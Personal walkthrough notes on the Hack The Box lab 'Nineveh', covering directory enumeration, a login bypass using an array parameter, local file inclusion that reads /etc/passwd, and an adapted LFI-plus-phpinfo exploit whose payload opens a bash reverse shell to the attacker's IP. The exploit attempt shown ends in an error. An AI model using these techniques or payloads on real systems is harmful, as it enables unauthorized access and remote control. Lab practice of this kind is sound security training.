2 :80
:80 :443 in parallel
http://nineveh.htb/
It works!
| splash page
$ gobuster dir -u http://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 100
===============================================================
/info.php (Status: 200) [Size: 83687]
/index.html (Status: 200) [Size: 178]
/department (Status: 301) [Size: 315] [--> http://10.10.10.43/department/]
http://nineveh.htb/info.php
PHP Version 7.0.18-0ubuntu0.16.04.1
System Linux nineveh 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64
Loaded Configuration File /etc/php/7.0/apache2/php.ini
Server Root /etc/apache2
DOCUMENT_ROOT /var/www/html
file_uploads On
http://nineveh.htb/department/ > http://nineveh.htb/department/login.php
login page
# view-source
<!-- @admin! MySQL is been installed.. please fix the login page! ~amrois -->
$ gobuster dir -u http://nineveh.htb/department/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 100
===============================================================
/header.php (Status: 200) [Size: 670]
/footer.php (Status: 200) [Size: 51]
/files (Status: 301) [Size: 321] [--> http://nineveh.htb/department/files/]
/login.php (Status: 200) [Size: 1560]
/index.php (Status: 200) [Size: 68]
/css (Status: 301) [Size: 319] [--> http://nineveh.htb/department/css/]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/manage.php (Status: 302) [Size: 0] [--> login.php]
# all redirect to login.php
# default admin:admin fails
# but user enum is possible
admin:admin => Invalid Password!
amrois:amrois => invalid username
# tried auth-bypass/sqli.txt - nothing.
# tried manual sqli to find columns - nothing.
# tried changing in burp password=password => password[]=
# works > http://nineveh.htb/department/manage.php
http://nineveh.htb/department/manage.php
logged in as admin
| notes section
http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.txt
Have you fixed the login page yet! hardcoded username and password is really bad idea!
check your serect folder to get in! figure it out! this is your challenge
Improve the db interface.
~amrois
# failed LFI using http://nineveh.htb/department/manage.php?notes=../../../../../../etc/passwd
# failed LFI http://nineveh.htb/department/manage.php?notes=files/../../../etc/passwd
http://nineveh.htb/department/manage.php?notes=files/ninevehNotes/etc/passwd
Warning: include(files/ninevehNotes/etc/passwd): failed to open stream: No such file or directory in /var/www/html/department/manage.php on line 31
# we are in /var/www/html/department
# no such file or directory
# removing ninevehnotes/
http://nineveh.htb/department/manage.php?notes=files/../../../../etc/passwd
No Note is selected
# error was good so adding ninevehnotes and removing files/
# we get LFI
http://nineveh.htb/department/manage.php?notes=/ninevehNotes.txt/../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
amrois:x:1000:1000:,,,:/home/amrois:/bin/bash
# also works http://nineveh.htb/department/manage.php?notes=/ninevehNotes.txt/../etc/passwd
# as fileUpload is On, testing LFI+PHPINFO = RCE.
# capturing info.php via burp
# changing GET, Content-Type and data
POST /info.php HTTP/1.1
Host: nineveh.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=mq5puchlsho4m8r1u0q2m3tl30
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------7db268605ae
Content-Length: 194
-----------------------------7db268605ae
Content-Disposition: form-data; name="dummyname"; filename="test.txt" Content-Type: text/plainSecurity
Test
-----------------------------7db268605ae
# response
<h2>PHP Variables</h2>
<table>
<tr class="h"><th>Variable</th><th>Value</th></tr>
<tr><td class="e">$_FILES['dummyname']</td><td class="v"><pre>Array
(
[name] => test.txt
[type] =>
[tmp_name] =>
[error] => 3
[size] => 0
)
# no tmp_name? weird?
# still running exploit to check
# added on top
local_ip="10.10.16.7"
local_port=443
phpsessid="mq5puchlsho4m8r1u0q2m3tl30"
# modified payload
PAYLOAD="""%s\r <?php system("bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'");?>\r""" % (TAG, local_ip, local_port)
# modified request location and added Cookie
REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r
Cookie: PHPSESSID=mq5puchlsho4m8r1u0q2m3tl30; othercookie="""+padding+"""\r
# modified LFIREQ; added cookie as we need to be logged in to access that page
LFIREQ="""GET /department/manage.php?notes=/ninevehNotes/..%s HTTP/1.1\r
Cookie: PHPSESSID=mq5puchlsho4m8r1u0q2m3tl30\r
# changed => to => (notes)
$ python phpinfolfi.py 10.10.10.43 80 100 130 ⨯
Don't forget to modify the LFI URL
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset... Traceback (most recent call last):
File "phpinfolfi.py", line 201, in <module>
main()
File "phpinfolfi.py", line 161, in main
offset = getOffset(host, port, reqphp)
File "phpinfolfi.py", line 120, in getOffset
raise ValueError("No php tmp_name in phpinfo output")
ValueError: No php tmp_name in phpinfo output
Last updated